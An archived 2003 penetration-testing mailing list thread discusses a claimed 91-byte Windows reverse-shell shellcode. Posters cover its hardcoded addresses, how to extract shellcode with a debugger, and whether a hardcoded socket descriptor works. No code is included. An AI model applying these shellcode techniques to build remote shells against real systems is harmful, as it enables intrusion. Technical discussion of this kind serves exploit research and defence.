Penetration Testing mailing list archives
Re: Advances In Windows Shellcode
From: "sk" <sk () scan-associates net>
Date: Wed, 15 Jan 2003 15:17:08 +0800
The 91++ bytes shellcode not only uses hard code addresses, it also using hard coded socket descriptor of 0x11, which should _not_ work. (Anyone get it working?) Perhaps what is missing is a routine to find socket descriptor of the current connection? sk
From: Ing. Bernardo Lopez (bloodk_at_prodigy.net.mx) Date: Wed Jan 01 2003 - 18:32:20 CST I know this is not the faster way but... Could be more easy to get the shellcode if you put in your program and rebuild it (whitin a debugger, like softice)then you dump that modified addres...
Whit this you can split the includes and other extra stuff, just getting the minimal shellcode nesesary...
Have a nice day
PS:Well then , my hipotetical method or by doing a C prog whit includes and all?
El mar, 31-12-2002 a las 23:02, Brett Moore escribió: Advances in windows shellcode are few and far between. Papers exist detailing the process using anonymous pipes and examples exist showing how to use a socket directly as the handle for stdin, stdout and stderr. RVA techniques can be used to write code that will run regardless of
service
pack, and there is not often times when shellcode space is extremely
limited
so we should be happy with universal remote callback shellcode of ~300 bytes. David Litchfield's post regarding using a socket as a handle included a statement: "If you hard code addresses ..... you can get the exploit code down to 160 bytes" Which got me to thinking of how to write smaller remote callback
shellcode.
What evolved was an idea, and then shellcode which sends a remote shell back, uses only 2 api calls, and is only 91 bytes in size. It does have limited uses, has hardcoded address for SP3, messy, could be refined but should provoke some interesting thought tangents. The code is not commented, is not at all user friendly, and to cut the
size
of the post is ill formated, but those who seek the answer should be able
to
get it work. And now I go on holiday, my byte sequence patent should be ready for
filing
by the time I get back ;)
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Advances In Windows Shellcode Brett Moore (Jan 01)
- Re: Advances In Windows Shellcode Ing. Bernardo Lopez (Jan 02)
- <Possible follow-ups>
- Re: Advances In Windows Shellcode sk (Jan 21)